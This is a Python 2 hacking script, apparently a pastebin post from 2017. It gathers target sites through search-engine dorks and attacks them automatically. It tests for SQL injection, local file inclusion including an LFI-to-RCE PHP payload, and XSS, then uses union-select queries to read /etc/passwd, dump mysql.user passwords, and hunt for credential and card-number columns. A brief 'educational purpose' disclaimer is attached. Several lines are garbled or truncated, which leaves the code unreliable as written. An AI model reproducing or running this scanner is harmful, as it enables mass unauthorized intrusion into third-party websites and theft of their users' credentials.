
Jan 10th, 2017
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  1. #!/usr/bin/python
  2. # This was written for educational purpose and pentest only. Use it at your own risk.
  3. # Author will be not responsible for any damage!
  4. # Toolname :
  5. # Coder : Muhammad Sobri Maulana - Pegasus
  6. # Version : 1.0
  7. #
  8. #
  10. import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
  11. from random import choice
  13. # Colours
  14. W = "33[0m";
  15. R = "33[31m";
  16. G = "33[32m";
  17. O = "33[33m";
  18. B = "33[34m";
  20. # Banner
  21. def logo():
  22. print R+"n|---------------------------------------------------------------|"
  23. print "| |"
  24. print "| v.1.0 |"
  25. print "| |"
  26. print "| |"
  27. print "|---------------------------------------------------------------|n"
  28. print W
  30. if sys.platform == 'linux' or sys.platform == 'linux2':
  31."clear", shell=True)
  32. logo()
  34. else:
  35."cls", shell=True)
  36. logo()
  38. log = "darkd0rk3r-sqli.txt"
  39. logfile = open(log, "a")
  40. lfi_log = "darkd0rk3r-lfi.txt"
  41. lfi_log_file = open(lfi_log, "a")
  42. rce_log = "darkd0rk3r-rce.txt"
  43. rce_log_file = open(rce_log, "a")
  44. xss_log = "darkd0rk3r-xss.txt"
  45. xss_log_file = open(xss_log, "a")
  47. threads = []
  48. finallist = []
  49. vuln = []
  50. col = []
  51. darkurl = []
  52. arg_end = "--"
  53. arg_eva = "+"
  54. colMax = 10 # Change this at your will
  55. gets = 0
  56. file = "/etc/passwd"
  57. timeout = 60
  58. socket.setdefaulttimeout(timeout)
  60. lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
  62. xsses = ["<h1>XSS by baltazar</h1>","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"]
  64. tables = ['user','users','tbladmins','Logins','logins','login','admins','members','member', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser','adminusers','article_admin', 'articles', 'artikel','author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login_admin', 'login_admins', 'login_user', 'login_users','logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users','memberlist','minibbtable_users', 'mitglieder', 'mybb_users', 'mysql', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_users', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', '', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members','user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights','vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers','wp_users', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'Category', 'CategoryGroup', 'ChicksPass', 'dtproperties', 'JamPass', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected','pristup', 'SubCategory', 'tblRestrictedPasswords', 'Ticket System Acc Numbers', 'Total Members', 'UserPreferences', 'tblConfigs', 'tblLogBookAuthor', 'tblLogBookUser', 'tblMails', 'tblOrders', 'tblUser', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin']
  66. columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'korisnicko', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', 'crack', 'customer', 'customers', 'cvvnumber', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']
  68. sqlerrors = {'MySQL': 'error in your SQL syntax',
  69. 'MiscError': 'mysql_fetch',
  70. 'MiscError2': 'num_rows',
  71. 'Oracle': 'ORA-01756',
  72. 'JDBC_CFM': 'Error Executing Database Query',
  73. 'JDBC_CFM2': 'SQLServer JDBC Driver',
  74. 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
  75. 'MSSQL_Uqm': 'Unclosed quotation mark',
  76. 'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
  77. 'MS-Access_JETdb': 'Microsoft JET Database',
  78. 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
  79. 'Server Error' : 'Server Error',
  80. 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
  81. 'Invalid Querystring' : 'Invalid Querystring',
  82. 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
  83. 'VBScript Runtime' : 'VBScript Runtime',
  84. 'ADODB.Field' : 'ADODB.Field',
  85. 'BOF or EOF' : 'BOF or EOF',
  86. 'ADODB.Command' : 'ADODB.Command',
  87. 'JET Database' : 'JET Database',
  88. 'mysql_fetch_array()' : 'mysql_fetch_array()',
  89. 'Syntax error' : 'Syntax error',
  90. 'mysql_numrows()' : 'mysql_numrows()',
  91. 'GetArray()' : 'GetArray()',
  92. 'FetchRow()' : 'FetchRow()',
  93. 'Input string was not in a correct format' : 'Input string was not in a correct format'}
  95. header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
  96. 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
  97. 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
  98. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
  99. 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
  100. 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:',
  101. 'Microsoft Internet Explorer/4.0b1 (Windows 95)',
  102. 'Opera/8.00 (Windows NT 5.1; U; en)',
  103. 'amaya/9.51 libwww/5.4.0',
  104. 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
  105. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
  106. 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
  107. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; bot; .NET CLR 1.1.4322)',
  108. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0',
  109. 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
  111. domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao',
  112. 'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb',
  113. 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo',
  114. 'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd',
  115. 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr',
  116. 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do',
  117. 'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi',
  118. 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf',
  119. 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs',
  120. 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu',
  121. 'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it',
  122. 'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn',
  123. 'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk',
  124. 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me',
  125. 'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr',
  126. 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc',
  127. 'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz',
  128. 'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn',
  129. 'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru',
  130. 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj',
  131. 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy',
  132. 'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm',
  133. 'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug',
  134. 'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi',
  135. 'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com',
  136. 'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel',
  137. 'name', 'aero', 'asia', 'cat', 'coop', 'jobs', 'mobi', 'museum',
  138. 'pro', 'travel'],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr',
  139. 'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil',
  140. 'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia',
  141. 'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']}
  143. def search(inurl, maxc):
  144. urls = []
  145. for site in sitearray:
  146. page = 0
  147. try:
  148. while page < int(maxc):
  149. jar = cookielib.FileCookieJar("cookies")
  150. query = inurl+"+site:"+site
  151. results_web = ''+query+'&hl=en&page='+repr(page)+'&src=hmp'
  152. request_web =urllib2.Request(results_web)
  153. agent = random.choice(header)
  154. request_web.add_header('User-Agent', agent)
  155. opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
  156. text =
  157. stringreg = re.compile('(?<=href=")(.*?)(?=")')
  158. names = stringreg.findall(text)
  159. page += 1
  160. for name in names:
  161. if name not in urls:
  162. if'(',name) or"<", name) or"A/", name) or"A(http://)d", name):
  163. pass
  164. elif"google",name) or"youtube", name) or"phpbuddy", name) or"iranhack",name) or"phpbuilder",name) or"codingforums", name) or"phpfreaks", name) or"%", name) or"facebook", name) or"twitter", name):
  165. pass
  166. else:
  167. urls.append(name)
  168. percent = int((1.0*page/int(maxc))*100)
  169. urls_len = len(urls)
  170. sys.stdout.write("rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))
  171. sys.stdout.flush()
  172. except(KeyboardInterrupt):
  173. pass
  174. tmplist = []
  175. print "nn[+] URLS (unsorted): ",len(urls)
  176. for url in urls:
  177. try:
  178. host = url.split("/",3)
  179. domain = host[2]
  180. if domain not in tmplist and "=" in url:
  181. finallist.append(url)
  182. tmplist.append(domain)
  184. except:
  185. pass
  186. print "[+] URLS (sorted) : ",len(finallist)
  187. return finallist
  189. class injThread(threading.Thread):
  190. def __init__(self,hosts):
  191. self.hosts=hosts
  192. self.fcount = 0
  193. self.check = True
  194. threading.Thread.__init__(self)
  196. def run (self):
  197. urls = list(self.hosts)
  198. for url in urls:
  199. try:
  200. if self.check == True:
  201. ClassicINJ(url)
  202. else:
  203. break
  204. except(KeyboardInterrupt,ValueError):
  205. pass
  206. self.fcount+=1
  208. def stop(self):
  209. self.check = False
  211. class lfiThread(threading.Thread):
  212. def __init__(self,hosts):
  213. self.hosts=hosts
  214. self.fcount = 0
  215. self.check = True
  216. threading.Thread.__init__(self)
  218. def run (self):
  219. urls = list(self.hosts)
  220. for url in urls:
  221. try:
  222. if self.check == True:
  223. ClassicLFI(url)
  224. else:
  225. break
  226. except(KeyboardInterrupt,ValueError):
  227. pass
  228. self.fcount+=1
  230. def stop(self):
  231. self.check = False
  233. class xssThread(threading.Thread):
  234. def __init__(self,hosts):
  235. self.hosts=hosts
  236. self.fcount = 0
  237. self.check = True
  238. threading.Thread.__init__(self)
  240. def run (self):
  241. urls = list(self.hosts)
  242. for url in urls:
  243. try:
  244. if self.check == True:
  245. ClassicXSS(url)
  246. else:
  247. break
  248. except(KeyboardInterrupt,ValueError):
  249. pass
  250. self.fcount+=1
  252. def stop(self):
  253. self.check = False
  255. def ClassicINJ(url):
  256. EXT = "'"
  257. host = url+EXT
  258. try:
  259. source = urllib2.urlopen(host).read()
  260. for type,eMSG in sqlerrors.items():
  261. if, source):
  262. print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"
  263. logfile.write("n"+host)
  264. vuln.append(host)
  265. col.append(host)
  266. break
  268. else:
  269. pass
  270. except:
  271. pass
  273. def ClassicLFI(url):
  274. lfiurl = url.rsplit('=', 1)[0]
  275. if lfiurl[-1] != "=":
  276. lfiurl = lfiurl + "="
  277. for lfi in lfis:
  278. try:
  279. check = urllib2.urlopen(lfiurl+lfi.replace("n", "")).read()
  280. if re.findall("root:x", check):
  281. print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"
  282. lfi_log_file.write("n"+lfiurl+lfi)
  283. vuln.append(lfiurl+lfi)
  284. target = lfiurl+lfi
  285. target = target.replace("/etc/passwd","/proc/self/environ")
  286. header = "<? echo md5(baltazar); ?>"
  287. try:
  288. request_web = urllib2.Request(target)
  289. request_web.add_header('User-Agent', header)
  290. text = urllib2.urlopen(request_web)
  291. text =
  292. if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
  293. print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"
  294. rce_log_file.write("n",target)
  295. vuln.append(target)
  296. except:
  297. pass
  299. except:
  300. pass
  302. def ClassicXSS(url):
  303. for xss in xsses:
  304. try:
  305. source = urllib2.urlopen(url+xss.replace("n","")).read()
  306. if re.findall("XSS by baltazar", source):
  307. print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"
  308. xss_log_file.write("n"+url+xss)
  309. vuln.append(url+xss)
  310. except:
  311. pass
  313. def injtest():
  314. print B+"n[+] Preparing for SQLi scanning ..."
  315. print "[+] Can take a while ..."
  316. print "[!] Working ...n"
  317. i = len(usearch) / int(numthreads)
  318. m = len(usearch) % int(numthreads)
  319. z = 0
  320. if len(threads) <= numthreads:
  321. for x in range(0, int(numthreads)):
  322. sliced = usearch[x*i:(x+1)*i]
  323. if (z<m):
  324. sliced.append(usearch[int(numthreads)*i+z])
  325. z +=1
  326. thread = injThread(sliced)
  327. thread.start()
  328. threads.append(thread)
  329. for thread in threads:
  330. thread.join()
  332. def lfitest():
  333. print B+"n[+] Preparing for LFI - RCE scanning ..."
  334. print "[+] Can take a while ..."
  335. print "[!] Working ...n"
  336. i = len(usearch) / int(numthreads)
  337. m = len(usearch) % int(numthreads)
  338. z = 0
  339. if len(threads) <= numthreads:
  340. for x in range(0, int(numthreads)):
  341. sliced = usearch[x*i:(x+1)*i]
  342. if (z<m):
  343. sliced.append(usearch[int(numthreads)*i+z])
  344. z +=1
  345. thread = lfiThread(sliced)
  346. thread.start()
  347. threads.append(thread)
  348. for thread in threads:
  349. thread.join()
  351. def xsstest():
  352. print B+"n[+] Preparing for XSS scanning ..."
  353. print "[+] Can take a while ..."
  354. print "[!] Working ...n"
  355. i = len(usearch) / int(numthreads)
  356. m = len(usearch) % int(numthreads)
  357. z = 0
  358. if len(threads) <= numthreads:
  359. for x in range(0, int(numthreads)):
  360. sliced = usearch[x*i:(x+1)*i]
  361. if (z<m):
  362. sliced.append(usearch[int(numthreads)*i+z])
  363. z +=1
  364. thread = xssThread(sliced)
  365. thread.start()
  366. threads.append(thread)
  367. for thread in threads:
  368. thread.join()
  370. menu = True
  371. new = 1
  372. while menu == True:
  373. if new == 1:
  374. threads = []
  375. finallist = []
  376. vuln = []
  377. col = []
  378. darkurl = []
  380. stecnt = 0
  381. for k,v in domains.items():
  382. stecnt += 1
  383. print str(stecnt)+" - "+k
  384. sitekey = raw_input("nChoose your target : ")
  385. sitearray = domains[domains.keys()[int(sitekey)-1]]
  387. inurl = raw_input('nEnter your dork : ')
  388. numthreads = raw_input('Enter no. of threads : ')
  389. maxc = raw_input('Enter no. of pages : ')
  390. print "nNumber of SQL errors :",len(sqlerrors)
  391. print "Number of LFI paths :",len(lfis)
  392. print "Number of XSS cheats :",len(xsses)
  393. print "Number of headers :",len(header)
  394. print "Number of threads :",numthreads
  395. print "Number of pages :",maxc
  396. print "Timeout in seconds :",timeout
  397. print ""
  399. usearch = search(inurl,maxc)
  400. new = 0
  402. print R+"n[0] Exit"
  403. print "[1] SQLi Testing"
  404. print "[2] SQLi Testing Auto Mode"
  405. print "[3] LFI - RCE Testing"
  406. print "[4] XSS Testing"
  407. print "[5] SQLi and LFI - RCE Testing"
  408. print "[6] SQLi and XSS Testing"
  409. print "[7] LFI - RCE and XSS Testing"
  410. print "[8] SQLi,LFI - RCE and XSS Testing"
  411. print "[9] Save valid urls to file"
  412. print "[10] Print valid urls"
  413. print "[11] Found vuln in last scan"
  414. print "[12] New Scann"
  416. chce = raw_input(":")
  417. if chce == '1':
  418. injtest()
  420. if chce == '2':
  421. injtest()
  422. print B+"n[+] Preparing for Column Finder ..."
  423. print "[+] Can take a while ..."
  424. print "[!] Working ..."
  425. # Thanks rsauron for schemafuzz
  426. for host in col:
  427. print R+"n[+] Target: ", O+host
  428. print R+"[+] Attempting to find the number of columns ..."
  429. print "[+] Testing: ",
  430. checkfor = []
  431. host = host.rsplit("'", 1)[0]
  432. sitenew = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva
  433. makepretty = ""
  434. for x in xrange(0, colMax):
  435. try:
  436. sys.stdout.write("%s," % (x))
  437. sys.stdout.flush()
  438. darkc0de = "dark"+str(x)+"c0de"
  439. checkfor.append(darkc0de)
  440. if x > 0:
  441. sitenew += ","
  442. sitenew += "0x"+darkc0de.encode("hex")
  443. finalurl = sitenew+arg_end
  444. gets += 1
  445. source = urllib2.urlopen(finalurl).read()
  446. for y in checkfor:
  447. colFound = re.findall(y, source)
  448. if len(colFound) >= 1:
  449. print "n[+] Column length is:", len(checkfor)
  450. nullcol = re.findall(("d+"), y)
  451. print "[+] Found null column at column #:", nullcol[0]
  452. for z in xrange(0, len(checkfor)):
  453. if z > 0:
  454. makepretty += ","
  455. makepretty += str(z)
  456. site = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva+makepretty
  457. print "[+] SQLi URL:", site+arg_end
  458. site = site.replace(","+nullcol[0]+",",",darkc0de,")
  459. site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
  460. site = site.replace(","+nullcol[0],",darkc0de")
  461. print "[+] darkc0de URL:", site
  462. darkurl.append(site)
  463. print "[-] Done!n"
  464. break
  466. except(KeyboardInterrupt, SystemExit):
  467. raise
  468. except:
  469. pass
  471. print "n[!] Sorry column length could not be foundn"
  473. #########
  475. print B+"n[+] Gathering MySQL Server Configuration..."
  476. for site in darkurl:
  477. head_URL = site.replace("darkc0de", "concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
  478. print R+"n[+] Target:", O+site
  479. while 1:
  480. try:
  481. gets += 1
  482. source = urllib2.urlopen(head_URL).read()
  483. match = re.findall("x1ex1eS+", source)
  484. if len(match) >= 1:
  485. match = match[0][2:].split("x1e")
  486. version = match[0]
  487. user = match[1]
  488. database = match[2]
  489. print W+"ntDatabase:", database
  490. print "tUser:", user
  491. print "tVersion:", version
  492. version = version[0]
  494. load = site.replace("darkc0de", "load_file(0x2f6574632f706173737764)")
  495. source = urllib2.urlopen(load).read()
  496. if re.findall("root:x", source):
  497. load = site.replace("darkc0de","concat_ws(char(58),load_file(0x"+file.encode("hex")+"),0x62616c74617a6172)")
  498. source = urllib2.urlopen(load).read()
  499. search = re.findall("baltazar",source)
  500. if len(search) > 0:
  501. print "n[!] w00t!w00t!: "+site.replace("darkc0de", "load_file(0x"+file.encode("hex")+")")
  503. load = site.replace("dakrc0de", "concat_ws(char(58),user,password,0x62616c74617a6172)")+arg_eva+"from"+arg_eva+"mysql.user"
  504. source = urllib2.urlopen(load).read()
  505. if re.findall("baltazar", source):
  506. print "n[!] w00t!w00t!: "+site.replace("darkc0de", "concat_ws(char(58),user,password)")+arg_eva+"from"+arg_eva+"mysql.user"
  508. print W+"n[+] Number of tables:",len(tables)
  509. print "[+] Number of columns:",len(columns)
  510. print "[+] Checking for tables and columns..."
  511. target = site.replace("darkc0de", "0x62616c74617a6172")+arg_eva+"from"+arg_eva+"T"
  512. for table in tables:
  513. try:
  514. target_table = target.replace("T", table)
  515. source = urllib2.urlopen(target_table).read()
  516. search = re.findall("baltazar", source)
  517. if len(search) > 0:
  518. print "n[!] w00t!w00t! Found a table called: < "+table+" >"
  519. print "n[+] Lets check for columns inside table < "+table+" >"
  520. for column in columns:
  521. try:
  522. source = urllib2.urlopen(target_table.replace("0x62616c74617a6172", "concat_ws(char(58),0x62616c74617a6172,"+column+")")).read()
  523. search = re.findall("baltazar", source)
  524. if len(search) > 0:
  525. print "t[!] w00t!w00t! Found a column called: < "+column+" >"
  526. except(KeyboardInterrupt, SystemExit):
  527. raise
  528. except(urllib2.URLErrr, socket.gaierror, socket.error, socket.timeout):
  529. pass
  531. print "n[-] Done searching inside table < "+table+" > for columns!"
  533. except(KeyboardInterrupt, SystemExit):
  534. raise
  535. except(urllib2.URLError, socket.gaierror, socket.error, socket.timeout):
  536. pass
  537. print "[!] Fuzzing is finished!"
  538. break
  539. except(KeyboardInterrupt, SystemExit):
  540. raise
  542. if chce == '3':
  543. lfitest()
  545. if chce == '4':
  546. xsstest()
  548. if chce == '5':
  549. injtest()
  550. lfitest()
  552. if chce == '6':
  553. injtest()
  554. xsstest()
  556. if chce == '7':
  557. lfitest()
  558. xsstest()
  560. if chce == '8':
  561. injtest()
  562. lfitest()
  563. xsstest()
  565. if chce == '9':
  566. print B+"nSaving valid urls ("+str(len(finallist))+") to file"
  567. listname = raw_input("Filename: ")
  568. list_name = open(listname, "w")
  569. finallist.sort()
  570. for t in finallist:
  571. list_name.write(t+"n")
  572. list_name.close()
  573. print "Urls saved, please check", listname
  575. if chce == '10':
  576. print W+"nPrinting valid urls:n"
  577. finallist.sort()
  578. for t in finallist:
  579. print B+t
  581. if chce == '11':
  582. print B+"nVuln found ",len(vuln)
  584. if chce == '12':
  585. new = 1
  586. print W+""
  588. if chce == '0':
  589. print R+"n[-] Exiting ..."
  590. mnu = False
  591. print W
  592. sys.exit(1)
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